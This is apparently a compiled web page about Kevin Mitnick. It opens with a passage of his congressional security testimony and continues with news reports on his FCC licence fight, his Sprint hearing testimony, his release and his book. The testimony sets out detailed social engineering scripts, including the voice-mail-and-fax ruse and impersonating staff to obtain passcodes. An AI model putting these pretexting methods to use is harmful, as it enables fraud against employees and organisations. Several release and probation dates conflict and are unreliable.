Computer users often choose passwords that are in the dictionary, or that have personal relevance, and are quite predictable. Static, or unchanging, passwords represent another easy method for breaching a computer system -- once a password is compromised, the user and the system administrators have no way of knowing the password is known to an intruder. Dynamic passwords, or non-dictionary passwords are problematic for many users, who write them down and keep them near their computers for easy access -- their own, or anyone who breaches physical security of the computer installation.

3.1.4 Uninstalled Software Updates

Out-of-date system software containing known security problems presents an easy target to an intruder. Systems administrators cannot keep systems updated as a result of work overload, competing priorities, or ignorance. The weaknesses of systems are publicized, and out-of-date systems typically offer well-known vulnerabilities for easy access.

3.1.5 Default Installations

Default installations of some operating systems disable many of the built-in security features in a given operating system. In addition, system administrators unintentionally misconfigure systems, or include unnecessary services that may lead to unauthorized access. Again, these weaknesses are widely publicized within the computing community, and default or misconfigured installations present an easy target.


4. Personnel Security


4.1 People

The most complex element in information security is the people who use the systems in which the information resides. Weaknesses in personnel security negate the effort and cost of the other three types of security: physical, network, and computer system security.

4.1.1 Social Engineering

Social engineering, or "gagging," is defined as gaining intelligence through deception. Employees are trained to be helpful, and to do what they are told in the workplace. The skilled social engineer will use these traits to his or her advantage as they seek to gain information that will enable them to achieve their objectives.

4.1.2 Email Attachments

Email attachments may be sent with covert code embedded within. Upon receiving the email, most people will launch the attachment, which can lower the security settings on the target machine without the user's knowledge. The likelihood of a successful installation using this method can be increased by following up the email submittal with a telephone call to prompt the person to open the attachment.

Information Security Exploits


--------------------------------------------------------------------------------

Information security exploits are the methods, tactics, and strategies used to breach the integrity, confidentiality, availability or access control of information. Discovery of compromised information security has several consequences, the most important of which is the decline in the level of trust associated with the compromised information and systems that contain that information. Examples of typical security exploits follow.

5. Physical Security Exploits


5.1 Data Backup Exploit

Using deception or sheer bravado, the intruder can walk into the off site backup storage facility, and ask for the physical data backup by pretending to be from a certain agency. The intruder can claim that particular backup is necessary to perform a data restoration. Once an intruder has physical possession of the data, the intruder can work with the data as though he possessed superuser, or system administrator, privileges.

5.2 Physical Access Exploit

If an intruder gains physical access to a computer and is able to reboot it, the intruder can gain complete control of the system and bypass all security measures. An extremely powerful exploit, but one that exposes the intruder to great personal risk because they're physically present on the premises.

5.3 Network Physical Access Exploit

Physical access to a network enables an intruder to install a tap on the network cable, which can be used to eavesdrop on all network traffic. Eavesdropping enables the intruder to capture passwords as they travel over the network, which will enable full access to the machines whose passwords are compromised.

6. Network Security Exploits


6.1 Network Vulnerability Probing Software

Network software exists that probes computers for weaknesses. Once one system weaknesses are revealed and the system is compromised, the intruder can install software (called ?sniffer? software) that compromises all systems on the network. Following that, an intruder can install software that logs the passwords used to access that compromised machine. Users routinely use the same or similar passwords across multiple machines; thus, once one password for one machine is obtained, then multiple machines can be compromised (see "Personnel Security Exploits").

7. Computer System Exploits


7.1 Program Vulnerabilities

Vulnerabilities in programs (e.g., the UNIX program sendmail) can be exploited to gain remote access to the target computer. Many system programs contain bugs that enable the intruder to trick the software into behaving in a way other than that which is intended in order to gain unauthorized access rights, even though the application is a part of the operating system of the computer.

7.2 Misconfigured Installations

A misconfigured installation on a computer in operation at the Raleigh News and Observer, a paper in Raleigh, North Carolina, demonstrates the problematic aspect of system misconfiguration. Using the UNIX program ?Finger,? which enables one to identify the users that are currently logged into a computer system, I created a user name on the computer system I controlled. The user name I assigned myself matched exactly the user name that existed on the target host. The misconfigured system was set to ?trust? any computer on the network, which left the entire network open for unauthorized access.


8. Personnel Security Exploits


8.1 Social Engineering

Social Engineering involves tricking or persuading people to reveal information or to take certain actions at the behest of the intruder. My work as a private investigator relied heavily on my skills in social engineering.

In my successful efforts to social engineer my way into Motorola, I used a three-level social engineering attack to bypass the information security measures then in use. First I was able to convince Motorola Operations employees to provide me, on repeated occasions, the pass code on their security access device, as well as the static PIN. The reason this was so extraordinary is that the pass code on their access device changed every 60 seconds: every time I wanted to gain unauthorized access, I had to call the Operations Center and ask for the password in effect for that minute.

The second level involved convincing the employees to enable an account for my use on one of their machines, and the third level involved convincing one of the engineers who was already entitled to access one of the computers to give me his password. I overcame that engineer's vigorous reluctance to provide the password by convincing him that I was a Motorola employee, and that I was looking at a form that documented the password that he used to access his personal workstation on Motorola's network -- despite the fact that he never filled out any such form! Once I gained access to that machine, I obtained Telnet access to the target machine, access which I had sought all along.

8.2 Voice Mail and Fax Exploit

This exploit relies on convincing an employee at a large company to enable a voice mailbox: the intruder would call the people who administer the voice mailboxes for the target company and request a mailbox. The pretext would be that the intruder works for a different division, and would like to retrieve messages without making a toll call.

Once the intruder has access to the voice mail system, the intruder would call the receptionist, represent himself as an employee of the company, and ask that they take messages for him; last but not least, the intruder would request the fax number and ask that incoming faxes be held for pickup. This sets the stage for the call to the target division of the company.

At this point, the intruder would call the target division to initiate the fax exploit with the goal of obtaining the targeted confidential company information. During that call the intruder would identify himself as an employee of the division whose voice mail and fax systems have just been compromised, he would cite the voice mail box in support of his identity, and would social engineer the target employee into faxing the target information to the compromised fax number located at one of their other offices.

Now the intruder would call the receptionist, tell the receptionist that he's in a business meeting, and ask that the receptionist fax the confidential material "to the hotel." The intruder picks up the fax containing confidential information at the secondary fax, which cannot be traced back to either the intruder or the targeted company.

I used this exploit to successfully compromise ATT's protected network access points routinely. ATT had learned that a system had been compromised by unauthorized entry at a central network access point called "DataKit." They imposed network access passwords on all DataKits to inhibit unauthorized access. I contacted one of the manager's secretaries and used the Fax Exploit to convince the secretary to fax me the password that enabled access to a DataKit that controlled dial-up access to ATT's worldwide computer network.


9. Recommendations


The Voice Mail and Fax Exploit demonstrates the most important element in my testimony today: that verification mechanisms are the weak link in information security, and voice mail and fax are the tools used to verify the authenticity of the credentials presented by someone seeking physical, network, or computer systems access.

The methods that will most effectively minimize the ability of intruders to compromise information security are comprehensive user training and education. Enacting policies and procedures simply won't suffice. Even with oversight the policies and procedures may not be effective: my access to Motorola, Nokia, ATT, Sun depended upon the willingness of people to bypass policies and procedures that were in place for years before I compromised them successfully. The corporate security measures that I breached were created by some of the best and brightest in the business, some of whom may even have been consulted by the committee as you drafted your legislation, Senate Bill S1993.

S1993 is represents a good first step toward the goal of increasing information security on government computer systems. I have several recommendations that I hope will increase the effectiveness of your bill.

1. Each agency perform a thorough risk assessment of the assets they want to protect.

2. Perform a cost-benefit analysis to determine whether the price to protect those systems represents real value.

3. Implement policies, procedures, standards and guidelines consistent with the risk assessment and cost benefit analyses. Employee training to recognize sophisticated social engineering attacks is of paramount importance.

4. After implementing the policies, procedures, standards and guidelines, create an audit and oversight program that measures compliance throughout the affected government agencies. The frequency of those audits ought to be determined consistent with the mission of a particular agency: the more valuable the data, the more frequent the audit process.

5. Create a numeric "trust ranking" that quantifies and summarizes the results of the audit and oversight programs described above. The numeric "trust ranking" would provide at-a-glance ranking -- a report card, if you will -- of the characteristics that comprise the four major categories defined above: physical, network, computer systems, and personnel.

6. Effective audit procedures -- implemented from the top down -- must be part of an appropriate system of rewards and consequences in order to motivate system administrators, personnel managers, and government employees to maintain effective information security consistent with the goals of this committee.


Conclusion


--------------------------------------------------------------------------------
Obviously a brief presentation such as the one I've made today cannot convey adequately the measures needed to implement effective information security measures. I'm happy to answer any questions that may have been left unanswered for any members of the Committee.



Return to the Beginning of this Document

FCC Moves to Take Mitnick's Radio Licence Away -- 12/22/2001

In a five-page order released Friday, the US Federal Communications Commission (FCC) claims that 38-year old convicted hacker Kevin Mitnick is not morally fit to be a ham radio operator.

"Mr. Mitnick's criminal background raises a substantial and material question of fact as to whether he possesses the requisite character qualifications to be and remain a commission licensee," the FCC said. "Given his propensity to engage in criminal activities, particularly those involving fraud, we have serious reservations about Mr. Mitnick's ability to comply with our rules and regulations in the future."

What's more, the FCC reminds us, "Mr. Mitnick's prolific and damaging hacking career made him the most wanted computer criminal in United States history."

Mitnick was convicted of hacking-related felonies and was released from prison in January of 2001. He's still on probation until January 2003.

Mitnick's had a ham radio license for about 25 years, and he applied two years ago for what's normally a routine renewal. He's not accused of making any illicit radio transmissions or any offenses that fall under the FCC's jurisdiction -- it's just that official Washington firmly believes computer hacking must be an unforgivable venal sin.

Under FCC regulations, Mitnick's loss of his license is probable, but not automatic. A hearing will be scheduled at some to-be-determined date before an FCC administrative law judge (who, no surprise, typically sides with the bureaucrats). Appeals go to the full commission and from there to the federal courts.

"It's just another example of them trying to harass me," Mitnick said Friday evening. "Now I've got to spend money to keep a ham license. How ridiculous."

"Obviously I'm going to have to fight for my right to be licensed," said Mitnick, who uses his ham radio every day. If Mitnick doesn't respond in 20 days, he automatically loses.

Federal law requires amateur radio enthusiasts to obtain a license from the government. Mitnick has a "general class" license that required him to pass a five-words-per-minute Morse code test. (His callsign is N6NHG.)

This action against Mitnick doesn't affect his "Dark Side of the Internet" radio show, which aired on KFI AM 640. Citing an advertising slowdown, the radio station gave it the axe on 10 December.

The FCC believes it can do pretty much whatever it wants to Mitnick thanks to an enormously favorable DC Circuit Court of Appeals ruling last year. The judges said that the FCC could rescind the license of an amateur radio operator convicted of calling long distance for free via fake access codes, a felony.

"There is nothing unreasonable about the FCC's conclusion that (Herbert) Schoenbohm's felony conviction was relevant to his license renewal. A conviction for fraudulent conduct plainly calls into question a licensee's ability to act in a manner consonant with FCC regulations," the panel of judges ruled three to zero.

Fortunately for Mitnick, there's still a way to fight back. He can confess that, yes, he was a felonious knave -- who's completely has changed his ways. The agency's own "Policy Regarding Character Qualifications in Broadcast Licensing" admits that "rehabilitation" is a mitigating factor.

Mitnick insists he's cured. "I was called to testify before Congress on federal computer security and now they're questioning my character," he says, noting that he even spent two days briefing the US Commission on National Security.

The prosecutor who put him behind bars thinks otherwise. Christopher Painter, now deputy chief of the Justice Department's computer crime section, said earlier this month that Mitnick is still an unrepentant wretch.

After running into his former courtroom adversary at the National Press Club, Painter said: "My problem with Mitnick these days is that he's never really accepted responsibility for his conduct... I hope he gets his life together, and I bear him no ill-will, but I think if you don't accept responsibility and you glamorize hacking and you get attention based on your former exploits, that sends the wrong message to people." (Mitnick was in town to speak at a Business Software Alliance conference.)

That was on December 6, 2001. Five days later, the FCC decided to take action against Mitnick. The decision became public on Friday.

A coincidence -- or a way to strike back at the world's most famous convicted hacker? Says Mitnick: "I'm surprised that after two years they did this. Why the delay? It's very suspicious to me."


Return to the Beginning of this Document

Mitnick Testifies Against Sprint in Vice Hack Case 6/24/2002

The ex-hacker details his past control of Las Vegas' telecom network, and raids his old storage locker to produce the evidence.

LAS VEGAS--Since adult entertainment operator Eddie Munoz first told state regulators in 1994 that mercenary hackers were crippling his business by diverting, monitoring and blocking his phone calls, officials at local telephone company Sprint of Nevada have maintained that, as far as they know, their systems have never suffered a single intrusion.

The Sprint subsidiary lost that innocence Monday when convicted hacker Kevin Mitnick shook up a hearing on the call-tampering allegations by detailing years of his own illicit control of the company's Las Vegas switching systems, and the workings of a computerized testing system that he says allows silent monitoring of any phone line served by the incumbent telco.

"I had access to most, if not all, of the switches in Las Vegas," testified Mitnick, at a hearing of Nevada's Public Utilities Commission (PUC). "I had the same privileges as a Northern Telecom technician."

Mitnick's testimony played out like a surreal Lewis Carroll version of a hacker trial -- with Mitnick calmly and methodically explaining under oath how he illegally cracked Sprint of Nevada's network, while the attorney for the victim company attacked his testimony, effectively accusing the ex-hacker of being innocent.

The plaintiff in the case, Munoz, 43, is accusing Sprint of negligence in allegedly allowing hackers to control their network to the benefit of a few crooked businesses. Munoz is the publisher of an adult advertising paper that sells the services of a bevy of in-room entertainers, whose phone numbers are supposed to ring to Munoz's switchboard. Instead, callers frequently get false busy signals, or reach silence, Munoz claims. Occasionally calls appear to be rerouted directly to a competitor. Munoz's complaints have been echoed by other outcall service operators, bail bondsmen and private investigators -- some of whom appeared at two days of hearings in March to testify for Munoz against Sprint.

Munoz hired Mitnick as a technical consultant in his case last year, after SecurityFocus Online reported that the ex-hacker -- a onetime Las Vegas resident -- claimed he had substantial access to Sprint's network up until his 1995 arrest. After running some preliminary tests, Mitnick withdrew from the case when Munoz fell behind in paying his consulting fees. On the last day of the March hearings, commissioner Adriana Escobar Chanos adjourned the matter to allow Munoz time to persuade Mitnick to testify, a feat Munoz pulled-off just in time for Monday's hearing.

Mitnick admitted that his testing produced no evidence that Munoz is experiencing call diversion or blocking. But his testimony casts doubt on Sprint's contention that such tampering is unlikely, or impossible. With the five year statute of limitations long expired, Mitnick appeared comfortable describing with great specificity how he first gained access to Sprint's systems while living in Las Vegas in late 1992 or early 1993, and then maintained that access while a fugitive.

Mitnick testified that he could connect to the control consoles -- quaintly called "visual display units" -- on each of Vegas' DMS-100 switching systems through dial-up modems intended to allow the switches to be serviced remotely by the company that makes them, Ontario-based Northern Telecom, renamed in 1999 to Nortel Networks.

Each switch had a secret phone number, and a default username and password, he said. He obtained the phone numbers and passwords from Sprint employees by posing as a Nortel technician, and used the same ploy every time he needed to use the dial-ups, which were inaccessible by default.

With access to the switches, Mitnick could establish, change, redirect or disconnect phone lines at will, he said.

That's a far cry from the unassailable system portrayed at the March hearings, when former company security investigator Larry Hill -- who retired from Sprint in 2000 -- testified "to my knowledge there's no way that a computer hacker could get into our systems." Similarly, a May 2001 filing by Scott Collins of Sprint's regulatory affairs department said that to the company's knowledge Sprint's network had "never been penetrated or compromised by so-called computer hackers."

Under cross examination Monday by PUC staff attorney Louise Uttinger, Collins admitted that Sprint maintains dial-up modems to allow Nortel remote access to their switches, but insisted that Sprint had improved security on those lines since 1995, even without knowing they'd been compromised before.

But Mitnick had more than just switches up his sleeve Monday.

The ex-hacker also discussed a testing system called CALRS (pronounced "callers"), the Centralized Automated Loop Reporting System. Mitnick first described CALRS to SecurityFocus Online last year as a system that allows Las Vegas phone company workers to run tests on customer lines from a central location. It consists of a handful of client computers, and remote servers attached to each of Sprint's DMS-100 switches.

Mitnick testified Monday that the remote servers were accessible through 300 baud dial-up modems, guarded by a technique only slightly more secure than simple password protection: the server required the client -- normally a computer program -- to give the proper response to any of 100 randomly chosen challenges. The ex-hacker said he was able to learn the Las Vegas dial-up numbers by conning Sprint workers, and he obtained the "seed list" of challenges and responses by using his social engineering skills on Nortel, which manufactures and sells the system.

The system allows users to silently monitor phone lines, or originate calls on other people's lines, Mitnick said.

Mitnick's claims seemed to inspire skepticism in the PUC's technical advisor, who asked the ex-hacker, shortly before the hearing was to break for lunch, if he could prove that he had cracked Sprint's network. Mitnick said he would try.

Two hours later, Mitnick returned to the hearing room clutching a crumpled, dog-eared and torn sheet of paper, and a small stack of copies for the commissioner, lawyers, and staff.

At the top of the paper was printed "3703-03 Remote Access Password List." A column listed 100 "seeds", numbered "00" through "99," corresponding to a column of four digit hexadecimal "passwords," like "d4d5" and "1554."

Commissioner Escobar Chanos accepted the list as an exhibit over the objections of Sprint attorney Patrick Riley, who complained that it hadn't been provided to the company in discovery. Mitnick retook the stand and explained that he used the lunch break to visit a nearby storage locker that he'd rented on a long-term basis years ago, before his arrest. "I wasn't sure if I had it in that storage locker," said Mitnick. "I hadn't been there in seven years."

"If the system is still in place, and they haven't changed the seed list, you could use this to get access to CALRS," Mitnick testified. "The system would allow you to wiretap a line, or seize dial tone."

Mitnick's return to the hearing room with the list generated a flurry of activity at Sprint's table; Ann Pongracz, the company's general counsel, and another Sprint employee strode quickly from the room -- Pongracz already dialing on a cell phone while she walked. Riley continued his cross examination of Mitnick, suggesting, again, that the ex-hacker may have made the whole thing up. "The only way I know that this is a Nortel document is to take you at your word, correct?," asked Riley. "How do we know that you're not social engineering us now?"

Mitnick suggested calmly that Sprint try the list out, or check it with Nortel. Nortel could not be reached for comment after hours Monday. The PUC hearing was to continue the next day.


Return to the Beginning of this Document

F.C.C. Lets Convicted Hacker Go Back on Net


WASHINGTON, Dec. 26, 2002 — Kevin Mitnick, once labeled by the federal government as "the most wanted computer criminal in U.S. history", has won a long fight to renew his ham radio license, and next month may resume surfing the Internet. He applied to renew his ham radio license in 1999, while in prison. The Federal Communications Commission ordered a hearing, noting that he once was "the most wanted computer criminal in U.S. history."

Richard Sippel, an administrative law judge with the commission, granted the license in a ruling made public on Monday. Mr. Mitnick, who began using ham radios when he was 13, said it cost him more than $16,000 in legal expenses to persuade the commission to renew his license. Typically, renewals are free.

The hacker, Kevin Mitnick, 39, of Thousand Oaks, Calif., served five years in federal prison for stealing software and altering data at Motorola, Novell, Nokia, Sun Microsystems and the University of Southern California. Prosecutors accused him of causing tens of millions of dollars in damage to corporate computer networks.

Mr. Mitnick was freed in January 2000. The terms of his probation, which expires on Jan. 20, 2002, require that he get government permission before using computers, software, modems or any devices that connect to the Internet. His travel and employment also are limited.

He has been allowed to use a cellphone and received permission this year to type a manuscript on a computer not connected to the Internet.

"Not being allowed to use the Internet is kind of like not being allowed to use a telephone," Mr. Mitnick said today in a phone interview.

He said he was starting a company to help companies protect themselves from computer attacks. Christopher Painter, deputy chief of the Justice Department's computer crime section and the former assistant United States attorney who prosecuted Mr. Mitnick, said that once Mr. Mitnick's probation is over, he will not be subject to any special surveillance.

Mr. Mitnick led the Federal Bureau of Investigation on a three-year hunt that ended in 1995 when agents arrested him in an apartment in Raleigh, N.C., with help from a top security expert. During the chase, Mr. Mitnick continued breaking into computer networks and became a cult figure among hackers.


Return to the Beginning of this Document

Kevin Mitnick publishes "The Art of Deception"


While still in prison, Kevin, along with William Simon, gets his informative book, The Art of Deception published by John Wiley and Sons. The publication date is listed as October 4, 2002.

Mitnick often used social engineering to get people in companies to reveal privileged and private information. In The Art of Deception, Mitnick takes the reader through a series of multi-stage situations where the hacker gets employees to reveal company privileged information. His claim is "people are the weakest part of a company's computer security."

After the lengthy and informative series of social engineering episodes, Mitnick finishes the book with a serious discussion of security policy for dealing with social engineering. This material is interesting and useful, and has not been published before in such a wide and understandable format. The security advice is thus quite valuable, and makes the book a good read for the security practitioner.



Return to the Beginning of this Document

Kevin released from Prison 01/21/2003

Kevin was released from prison on January 21, 2003. Since his release from prison, Mr. Mitnick has appeared on television, as an expert witness in the courtroom and before Congress, offering advice about computer security.

He also appeared in the WebCast, "From Chaos to Control" first given in February, 2003. The webcast can still be heard at the link

http://www.netiq.com/netiqtv/security/chaostocontrolWebcast.asp



Return to the Beginning of this Document